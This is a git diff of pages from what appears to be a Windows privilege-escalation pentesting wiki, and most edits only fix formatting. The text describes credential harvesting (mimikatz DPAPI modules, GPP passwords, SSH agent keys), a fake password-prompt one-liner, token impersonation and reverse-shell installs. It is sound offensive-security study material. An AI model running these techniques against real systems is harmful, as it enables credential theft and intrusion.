 **DPAPI allows developers to encrypt keys using a symmetric key derived from the user's logon secrets**, or in the case of system encryption, using the system's domain authentication secrets.
 
- The DPAPI keys used for encrypting the user's RSA keys are stored under `%APPDATA%\Microsoft\Protect\{SID}` directory, where {SID} is the [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier) of that user. **The DPAPI key is stored in the same file as the master key that protects the users private keys**. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it using`dir` from the cmd, but you can list it from PS).
+&#x20;The DPAPI keys used for encrypting the user's RSA keys are stored under `%APPDATA%\Microsoft\Protect\{SID}` directory, where {SID} is the [Security Identifier](https://en.wikipedia.org/wiki/Security\_Identifier) of that user. **The DPAPI key is stored in the same file as the master key that protects the users private keys**. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it using`dir` from the cmd, but you can list it from PS).
 
 ```
 Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
@@ -875,8 +875,8 @@ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 ```
 
-You can use **mimikatz module** `dpapi::cred` with the appropiate` /masterkey` to decrypt.\
-You can** extract many DPAPI** **masterkeys **from **memory **with the `sekurlsa::dpapi` module (if you are root).
+You can use **mimikatz module** `dpapi::cred` with the appropiate `/masterkey` to decrypt.\
+You can **extract many DPAPI** **masterkeys** from **memory** with the `sekurlsa::dpapi` module (if you are root).
 
 ### Wifi
 
@@ -907,14 +907,14 @@ HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
 %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
 ```
 
-Use the **Mimikatz **`dpapi::rdg` module with appropriate `/masterkey` to **decrypt any .rdg files**\
+Use the **Mimikatz** `dpapi::rdg` module with appropriate `/masterkey` to **decrypt any .rdg files**\
 You can **extract many DPAPI masterkeys** from memory with the Mimikatz `sekurlsa::dpapi` module
 
 ### AppCmd.exe
 
 **Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.**\
 **AppCmd.exe** is located in the `%systemroot%\system32\inetsrv\` directory.\
-If this file exists then it is possible that some **credentials **have been configured and can be **recovered**.
+If this file exists then it is possible that some **credentials** have been configured and can be **recovered**.
 
 This code was extracted from _**PowerUP**_:
 
@@ -999,7 +999,7 @@ function Get-ApplicationHost {
 ### SCClient / SCCM
 
 Check if `C:\Windows\CCM\SCClient.exe` exists .\
-Installers are **run with SYSTEM privileges**, many are vulnerable to **DLL Sideloading (Info from **[**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).**
+Installers are **run with SYSTEM privileges**, many are vulnerable to **DLL Sideloading (Info from** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).**
 
 ```bash
 $result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
@@ -1029,7 +1029,7 @@ SSH private keys can be stored inside the registry key `HKCU\Software\OpenSSH\Ag
 reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys
 ```
 
-If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\
+If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using [https://github.com/ropnop/windows\_sshagent\_extract](https://github.com/ropnop/windows\_sshagent\_extract).\
 More information about this technique here: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/)
 
 If `ssh-agent` service is not running and you want it to automatically start on boot run:
@@ -1059,7 +1059,7 @@ C:\unattend.inf
 dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
 ```
 
-You can also search for these files using **metasploit**: _post/windows/gather/enum_unattend_
+You can also search for these files using **metasploit**: _post/windows/gather/enum\_unattend_
 
 Example content_:_
 
@@ -1114,7 +1114,7 @@ Search for a file called **SiteList.xml**
 
 Before KB2928120 (see MS14-025), some Group Policy Preferences could be configured with a custom account. This feature was mainly used to deploy a custom local administrator account on a group of machines. There were two problems with this approach though. First, since the Group Policy Objects are stored as XML files in SYSVOL, any domain user can read them. The second problem is that the password set in these GPPs is AES256-encrypted with a default key, which is publicly documented. This means that any authenticated user could potentially access very sensitive data and elevate their privileges on their machine or even the domain. This function will check whether any locally cached GPP file contains a non-empty "cpassword" field. If so, it will decrypt it and return a custom PS object containing some information about the GPP along with the location of the file.
 
-Search in** **_**C:\ProgramData\Microsoft\Group Policy\history** _ or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista) _for these files:
+Search in ** **_**C:\ProgramData\Microsoft\Group Policy\history** _ or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ for these files:
 
 * Groups.xml
 * Services.xml
@@ -1192,7 +1192,7 @@ Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAct
 
 ### Ask for credentials
 
-You can always** ask the user to enter his credentials of even the credentials of a different user** if you think he can know them (notice that **asking **the client directly for the **credentials **is really **risky**):
+You can always **ask the user to enter his credentials of even the credentials of a different user** if you think he can know them (notice that **asking** the client directly for the **credentials** is really **risky**):
 
 ```bash
 $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
@@ -1204,7 +1204,7 @@ $cred.GetNetworkCredential() | fl
 
 ### **Possible filenames containing credentials**
 
-Known files that some time ago contained **passwords **in **clear-text** or **Base64**
+Known files that some time ago contained **passwords** in **clear-text** or **Base64**
 
 ```bash
 $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
@@ -1285,7 +1285,7 @@ Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAct
 
 You should also check the Bin to look for credentials inside it
 
-To **recover passwords** saved by several programs you can use: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html)
+To **recover passwords** saved by several programs you can use: [http://www.nirsoft.net/password\_recovery\_tools.html](http://www.nirsoft.net/password\_recovery\_tools.html)
 
 ### Inside the registry
 
@@ -1302,7 +1302,7 @@ reg query "HKCU\Software\OpenSSH\Agent\Key"
 
 ### Browsers History
 
-You should check for dbs where passwords from** Chrome or Firefox **are stored.\
+You should check for dbs where passwords from **Chrome or Firefox** are stored.\
 Also check for the history, bookmarks and favourites of the browsers so maybe some **passwords are** stored there.
 
 Tools to extract passwords from browsers:
@@ -1339,11 +1339,11 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /d
 
 ### Tools that search for passwords
 
-[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials)** is a msf** plugin I have created this plugin to **automatically execute every metasploit POST module that searches for credentials** inside the victim.\
+[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **is a msf** plugin I have created this plugin to **automatically execute every metasploit POST module that searches for credentials** inside the victim.\
 [**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) automatically search for all the files containing passwords mentioned in this page.\
 [**Lazagne**](https://github.com/AlessandroZ/LaZagne) is another great tool to extract password from a system.
 
-The tool [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) search for **sessions**, **usernames **and **passwords** of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
+The tool [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) search for **sessions**, **usernames** and **passwords** of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
 
 ```bash
 Import-Module path\to\SessionGopher.ps1;
@@ -1365,11 +1365,11 @@ A `pipe` is a block of shared memory that processes can use for communication an
 
 `Named Pipes` is a Windows mechanism that enables two unrelated processes to exchange data between themselves, even if the processes are located on two different networks. It's very similar to client/server architecture as notions such as `a named pipe server` and a named `pipe client` exist.
 
-When a **client writes on a pipe**, the **server **that created the pipe can **impersonate **the **client **if it has **SeImpersonate **privileges. Then, if you can find a **privileged process that is going to write on any pipe that you can impersonate**, you could be able to **escalate privileges** impersonating that process after it writes inside your created pipe. [**You can read this to learn how to perform this attack**](named-pipe-client-impersonation.md)**.**
+When a **client writes on a pipe**, the **server** that created the pipe can **impersonate** the **client** if it has **SeImpersonate** privileges. Then, if you can find a **privileged process that is going to write on any pipe that you can impersonate**, you could be able to **escalate privileges** impersonating that process after it writes inside your created pipe. [**You can read this to learn how to perform this attack**](named-pipe-client-impersonation.md)**.**
 
 ## From Administrator Medium to High Integrity Level / UAC Bypass
 
-****[**Read this to learn about Integrity Levels**](integrity-levels.md)** and **[**this to learn what is UAC**](../authentication-credentials-uac-and-efs.md#uac)**, then read how to**[** bypass it**](../authentication-credentials-uac-and-efs.md#uac)**.**
+****[**Read this to learn about Integrity Levels**](integrity-levels.md) **and** [**this to learn what is UAC**](../authentication-credentials-uac-and-efs.md#uac)**, then read how to**[ **bypass it**](../authentication-credentials-uac-and-efs.md#uac)**.**
 
 ## **From High Integrity to System**
 
@@ -1384,71 +1384,71 @@ sc start newservicename
 
 ### AlwaysInstallElevated
 
-From a High Integrity process you could try to **enable the AlwaysInstallElevated registry entries** and **install **a reverse shell using a _**.msi**_ wrapper. \
+From a High Integrity process you could try to **enable the AlwaysInstallElevated registry entries** and **install** a reverse shell using a _**.msi**_ wrapper. \
 [More information about the registry keys involved and how to install a _.msi_ package here.](./#alwaysinstallelevated)
 
 ### High + SeImpersonate privilege to System
 
-**You can **[**find the code here**](seimpersonate-from-high-to-system.md)**.**
+**You can** [**find the code here**](seimpersonate-from-high-to-system.md)**.**
 
 ### From SeDebug + SeImpersonate to Full Token privileges
 
 If you have those token privileges (probably you will find this in an already High Integrity process), you will be able to **open almost any process** (not protected processes) with the SeDebug privilege, **copy the token** of the process, and create an **arbitrary process with that token**.\
 Using this technique is usually **selected any process running as SYSTEM with all the token privileges** (_yes, you can find SYSTEM processes without all the token privileges_).\
-**You can find an **[**example of code executing the proposed technique here**](sedebug-+-seimpersonate-copy-token.md)**.**
+**You can find an** [**example of code executing the proposed technique here**](sedebug-+-seimpersonate-copy-token.md)**.**
 
 ### **Named Pipes**
 
-This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server **that created the pipe using the **`SeImpersonate` **privilege will be able to **impersonate the token** of the pipe client (the service) obtaining SYSTEM privileges.\
+This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server** that created the pipe using the **`SeImpersonate` ** privilege will be able to **impersonate the token** of the pipe client (the service) obtaining SYSTEM privileges.\
 If you want to [**learn more about name pipes you should read this**](./#named-pipe-client-impersonation).\
 If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md).
 
 ### Dll Hijacking
 
-If you manages to** hijack a dll** being **loaded **by a **process **running as **SYSTEM **you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful to this kind of privilege escalation, and, moreover, if far **more easy to achieve from a high integrity process** as it will have **write permissions **on the folders used to load dlls.\
-**You can **[**learn more about Dll hijacking here**](dll-hijacking.md)**.**
+If you manages to **hijack a dll** being **loaded** by a **process** running as **SYSTEM** you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful to this kind of privilege escalation, and, moreover, if far **more easy to achieve from a high integrity process** as it will have **write permissions** on the folders used to load dlls.\
+**You can** [**learn more about Dll hijacking here**](dll-hijacking.md)**.**
 
 ### **From Administrator or Network Service to System**
 
 {% embed url="https://github.com/sailay1996/RpcSsImpersonator" %}
 
-###  From LOCAL SERVICE or NETWORK SERVICE to full privs
+### &#x20;From LOCAL SERVICE or NETWORK SERVICE to full privs
 
-**Read: **[**https://github.com/itm4n/FullPowers**](https://github.com/itm4n/FullPowers)****
+**Read:** [**https://github.com/itm4n/FullPowers**](https://github.com/itm4n/FullPowers)****
 
 ## More help
 
-[Static impacket binaries](https://github.com/ropnop/impacket_static_binaries)
+[Static impacket binaries](https://github.com/ropnop/impacket\_static\_binaries)
 
 ## Useful tools
 
-#### **Best tool to look for Windows local privilege escalation vectors: **[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)****
+#### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)****
 
 #### PS
 
-****[**PrivescCheck **](https://github.com/itm4n/PrivescCheck)****\
+****[**PrivescCheck** ](https://github.com/itm4n/PrivescCheck)****\
 ****[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) -- Check for misconfigurations and sensitive files ([check here](broken-reference)). Detected.\
-[**JAWS**](https://github.com/411Hall/JAWS)** **-- Check for some possible misconfigurations and gather info ([check here](broken-reference)).\
-[**privesc **](https://github.com/enjoiz/Privesc)-- Check for misconfigurations\
-[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher)** **-- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use **-Thorough** in local.\
-[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump)** **-- Extracts crendentials from Credential Manager. Detected.\
-[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray)** **-- Spray gathered passwords across domain\
-[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh)** **-- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.\
+[**JAWS**](https://github.com/411Hall/JAWS) **** -- Check for some possible misconfigurations and gather info ([check here](broken-reference)).\
+[**privesc** ](https://github.com/enjoiz/Privesc)-- Check for misconfigurations\
+[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **** -- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use **-Thorough** in local.\
+[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **** -- Extracts crendentials from Credential Manager. Detected.\
+[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **** -- Spray gathered passwords across domain\
+[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **** -- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.\
 [**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) -- Basic privesc Windows enumeration\
-[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock)~~**  **~~-- Search for known privesc vulnerabilities (DEPRECATED for Watson)\
-[~~**WINspect**~~](https://github.com/A-mIn3/WINspect)~~** **~~-- Local checks** (Need Admin rights)**
+[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock)  ~~****~~  -- Search for known privesc vulnerabilities (DEPRECATED for Watson)\
+[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) ~~****~~ -- Local checks **(Need Admin rights)**
 
 #### Exe
 
-[**Watson**](https://github.com/rasta-mouse/Watson)** **-- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
-[**SeatBelt**](https://github.com/GhostPack/Seatbelt)** **-- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled)** (**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
-****[**LaZagne**](https://github.com/AlessandroZ/LaZagne)** **-- Extracts credentials from lots of softwares (precompiled exe in github)\
-[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot)~~** **~~-- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
+[**Watson**](https://github.com/rasta-mouse/Watson) **** -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
+[**SeatBelt**](https://github.com/GhostPack/Seatbelt) **** -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
+****[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **** -- Extracts credentials from lots of softwares (precompiled exe in github)\
+[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) ~~****~~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
 [~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10.
 
 #### Bat
 
-****[**winPEASbat **](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Tool created based in this post (it does not need accesschk to work properly but it can use it).
+****[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Tool created based in this post (it does not need accesschk to work properly but it can use it).
 
 #### Local
 
@@ -1457,7 +1457,7 @@ If you manages to** hijack a dll** being **loaded **by a **process **running as
 
 #### Meterpreter
 
-_multi/recon/local_exploit_suggestor_
+_multi/recon/local\_exploit\_suggestor_
 
 You have to compile the project using the correct version of .NET ([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). To see the installed version of .NET on the victim host you can do:
 
@@ -1472,7 +1472,7 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the
 [http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html](http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html)\
 [https://github.com/sagishahar/lpeworkshop](https://github.com/sagishahar/lpeworkshop)\
 [https://www.youtube.com/watch?v=\_8xJaaQlpBo](https://www.youtube.com/watch?v=\_8xJaaQlpBo)\
-[https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html](https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html)\
+[https://sushant747.gitbooks.io/total-oscp-guide/privilege\_escalation\_windows.html](https://sushant747.gitbooks.io/total-oscp-guide/privilege\_escalation\_windows.html)\
 [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)\
 [https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)\
 [https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md)\
diff --git a/windows/windows-local-privilege-escalation/access-tokens.md b/windows/windows-local-privilege-escalation/access-tokens.md
index be08aa8d..3dd310ed 100644
--- a/windows/windows-local-privilege-escalation/access-tokens.md
+++ b/windows/windows-local-privilege-escalation/access-tokens.md
@@ -2,7 +2,7 @@
 
 ## Access Tokens
 
-Each **user logged **onto the system **holds an access token with security information** for that logon session. The system creates an access token when the user logs on. **Every process executed** on behalf of the user **has a copy of the access token**. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
+Each **user logged** onto the system **holds an access token with security information** for that logon session. The system creates an access token when the user logs on. **Every process executed** on behalf of the user **has a copy of the access token**. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
 
 You can see this information executing `whoami /all`
 
@@ -50,24 +50,24 @@ SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
 SeTimeZonePrivilege           Change the time zone                 Disabled
 ```
 
- or using_ Process Explorer_ from Sysinternals (select process and access"Security" tab):
+&#x20;or using _Process Explorer_ from Sysinternals (select process and access"Security" tab):
 
 ![](<../../.gitbook/assets/image (321).png>)
 
 ### Local administrator
 
-When a local administrator logins,** two access tokens are created**: One with admin rights and other one with normal rights. **By default**, when this user executes a process the one with **regular** (non-administrator) **rights is used**. When this user tries to **execute **anything **as administrator **("Run as Administrator" for example) the **UAC **will be used to ask for permission.\
+When a local administrator logins, **two access tokens are created**: One with admin rights and other one with normal rights. **By default**, when this user executes a process the one with **regular** (non-administrator) **rights is used**. When this user tries to **execute** anything **as administrator** ("Run as Administrator" for example) the **UAC** will be used to ask for permission.\
 If you want to [**learn more about the UAC read this page**](../authentication-credentials-uac-and-efs.md#uac)**.**
 
 ### Credentials user impersonation
 
-If you have** valid credentials of any other user**, you can **create **a **new logon session **with those credentials :
+If you have **valid credentials of any other user**, you can **create** a **new logon session** with those credentials :
 
 ```
 runas /user:domain\username cmd.exe
 ```
 
-The **access token** has also a **reference **of the logon sessions inside the **LSASS**, this is useful if the process needs to access some objects of the network.\
+The **access token** has also a **reference** of the logon sessions inside the **LSASS**, this is useful if the process needs to access some objects of the network.\
 You can launch a process that **uses different credentials for accessing network services** using:
 
 ```
@@ -81,18 +81,18 @@ This is useful if you have useful credentials to access objects in the network b
 There are two types of tokens available:
 
 * **Primary token**: Primary tokens can only be **associated to processes**, and they represent a process's security subject. The creation of primary tokens and their association to processes are both privileged operations, requiring two different privileges in the name of privilege separation - the typical scenario sees the authentication service creating the token, and a logon service associating it to the user's operating system shell. Processes initially inherit a copy of the parent process's primary token.
-*   **Impersonation token**: Impersonation is a security concept implemented in Windows NT that **allows **a server application to **temporarily **"**be**" **the client **in terms of access to secure objects. Impersonation has **four possible levels**: 
+*   **Impersonation token**: Impersonation is a security concept implemented in Windows NT that **allows** a server application to **temporarily** "**be**" **the client** in terms of access to secure objects. Impersonation has **four possible levels**:&#x20;
 
     * **anonymous**, giving the server the access of an anonymous/unidentified user
     * **identification**, letting the server inspect the client's identity but not use that identity to access objects
     * **impersonation**, letting the server act on behalf of the client
-    * **delegation**, same as impersonation but extended to remote systems to which the server connects (through the preservation of credentials). 
+    * **delegation**, same as impersonation but extended to remote systems to which the server connects (through the preservation of credentials).&#x20;
 
     The client can choose the maximum impersonation level (if any) available to the server as a connection parameter. Delegation and impersonation are privileged operations (impersonation initially was not, but historical carelessness in the implementation of client APIs failing to restrict the default level to "identification", letting an unprivileged server impersonate an unwilling privileged client, called for it). **Impersonation tokens can only be associated to threads**, and they represent a client process's security subject. Impersonation tokens are usually created and associated to the current thread implicitly, by IPC mechanisms such as DCE RPC, DDE and named pipes.
 
 #### Impersonate Tokens
 
-Using the _**incognito **_**module **of metasploit if you have enough privileges you can easily **list **and **impersonate **other **tokens**. This could be useful to perform** actions as if you where the other user**. You could also **escalate privileges **with this technique.
+Using the _**incognito**_** module** of metasploit if you have enough privileges you can easily **list** and **impersonate** other **tokens**. This could be useful to perform **actions as if you where the other user**. You could also **escalate privileges** with this technique.
 
 ### Token Privileges
 
diff --git a/windows/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/windows/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index 30c5122c..618402ea 100644
--- a/windows/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/windows/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -6,8 +6,8 @@ An **ACL is an ordered list of ACEs** that define the protections that apply to
 
 An object’s security descriptor can contain **two ACLs**:
 
-1. A **DACL **that **identifies **the **users **and **groups **that are **allowed **or **denied **access
-2. A **SACL **that controls **how **access is **audited**
+1. A **DACL** that **identifies** the **users** and **groups** that are **allowed** or **denied** access
+2. A **SACL** that controls **how** access is **audited**
 
 When a user tries to access a file, the Windows system runs an AccessCheck and compares the security descriptor with the users access token and evaluates if the user is granted access and what kind of access depending on the ACEs set.
 
@@ -21,7 +21,7 @@ SACLs makes it possible to monitor access to secured objects. ACEs in a SACL det
 
 ## How the System Uses ACLs
 
-Each **user logged **onto the system **holds an access token with security information** for that logon session. The system creates an access token when the user logs on. **Every process executed** on behalf of the user **has a copy of the access token**. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
+Each **user logged** onto the system **holds an access token with security information** for that logon session. The system creates an access token when the user logs on. **Every process executed** on behalf of the user **has a copy of the access token**. The token identifies the user, the user's groups, and the user's privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
 
 When a thread tries to access a securable object, the LSASS (Local Security Authority) either grants or denies access. To do this, the **LSASS searches the DACL** (Discretionary Access Control List) in the SDS data stream, looking for ACEs that apply to the thread.
 
@@ -41,9 +41,9 @@ Because the **system stops checking ACEs when the requested access is explicitly
 
 The preferred order of ACEs in a DACL is called the "canonical" order. For Windows 2000 and Windows Server 2003, the canonical order is the following:
 
-1. All **explicit **ACEs are placed in a group **before **any **inherited **ACEs.
-2. Within the group of **explicit **ACEs, **access-denied** ACEs are placed **before access-allowed **ACEs.
-3. Within the **inherited **group, ACEs that are inherited from the **child object's parent come first**, and **then **ACEs inherited from the **grandparent**, **and so **on up the tree of objects. After that,** access-denied** ACEs are placed **before access-allowed** ACEs.
+1. All **explicit** ACEs are placed in a group **before** any **inherited** ACEs.
+2. Within the group of **explicit** ACEs, **access-denied** ACEs are placed **before access-allowed** ACEs.
+3. Within the **inherited** group, ACEs that are inherited from the **child object's parent come first**, and **then** ACEs inherited from the **grandparent**, **and so** on up the tree of objects. After that, **access-denied** ACEs are placed **before access-allowed** ACEs.
 
 The following figure shows the canonical order of ACEs:
 
@@ -53,7 +53,7 @@ The following figure shows the canonical order of ACEs:
 
 The canonical order ensures that the following takes place:
 
-* An explicit** access-denied ACE is enforced regardless of any explicit access-allowed ACE**. This means that the object's owner can define permissions that allow access to a group of users and deny access to a subset of that group.
+* An explicit **access-denied ACE is enforced regardless of any explicit access-allowed ACE**. This means that the object's owner can define permissions that allow access to a group of users and deny access to a subset of that group.
 * All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified.
 
 ### GUI Example
@@ -108,7 +108,7 @@ ACEs are fundamentally alike. What sets them apart is the degree of control they
 
 A generic ACE offers limited control over the kinds of child objects that can inherit them. Essentially, they can distinguish only between containers and noncontainers.
 
-For example, the DACL (Discretionary Access Control List) on a Folder object in NTFS can include a generic ACE that allows a group of users to list the folder's contents. Because listing a folder's contents is an operation that can be performed only on a Container object, the ACE that allows the operation can be flagged as a CONTAINER_INHERIT_ACE. Only Container objects in the folder (that is, only other Folder objects) inherit the ACE. Noncontainer objects (that is, File objects) do not inherit the ACE of the parent object.
+For example, the DACL (Discretionary Access Control List) on a Folder object in NTFS can include a generic ACE that allows a group of users to list the folder's contents. Because listing a folder's contents is an operation that can be performed only on a Container object, the ACE that allows the operation can be flagged as a CONTAINER\_INHERIT\_ACE. Only Container objects in the folder (that is, only other Folder objects) inherit the ACE. Noncontainer objects (that is, File objects) do not inherit the ACE of the parent object.
 
 A generic ACE applies to an entire object. If a generic ACE gives a particular user Read access, the user can read all the information that is associated with the object — both data and properties. This is not a serious limitation for most object types. File objects, for example, have few properties, which are all used for describing characteristics of the object rather than for storing information. Most of the information in a File object is stored as object data; therefore, there is little need for separate controls on a file's properties.
 
diff --git a/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
index ea853e14..698bf27c 100644
--- a/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
+++ b/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
@@ -1,6 +1,6 @@
 # AppendData/AddSubdirectory permission over service registry
 
-**Information copied from **[**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/)****
+**Information copied from** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/)****
 
 According to the output of the script, the current user has some write permissions on two registry keys:
 
@@ -41,7 +41,7 @@ What does this mean exactly? It means that we cannot just modify the `ImagePath`
 
 Does it mean that it was indeed a false positive? Surely not. Let the fun begin!
 
-### RTFM <a href="rtfm" id="rtfm"></a>
+### RTFM <a href="#rtfm" id="rtfm"></a>
 
 At this point, we know that we can create arbirary subkeys under `HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper` but we cannot modify existing subkeys and values. These already existing subkeys are `Parameters` and `Security`, which are quite common for Windows services.
 
@@ -87,7 +87,7 @@ DWORD APIENTRY ClosePerfData();
 
 I think that’s enough with the theory, it’s time to start writing some code!
 
-### Writing a Proof-of-Concept <a href="writing-a-proof-of-concept" id="writing-a-proof-of-concept"></a>
+### Writing a Proof-of-Concept <a href="#writing-a-proof-of-concept" id="writing-a-proof-of-concept"></a>
 
 Thanks to all the bits and pieces I was able to collect throughout the documentation, writing a simple Proof-of-Concept DLL should be pretty straightforward. But still, we need a plan!
 
@@ -230,7 +230,7 @@ If you want to see the full code, I uploaded it [here](https://gist.github.com/i
 
 Finally, we can select _**Release/x64**_ and “_**Build the solution**_”. This will produce our DLL file: `.\DllRpcEndpointMapperPoc\x64\Release\DllRpcEndpointMapperPoc.dll`.
 
-### Testing the PoC <a href="testing-the-poc" id="testing-the-poc"></a>
+### Testing the PoC <a href="#testing-the-poc" id="testing-the-poc"></a>
 
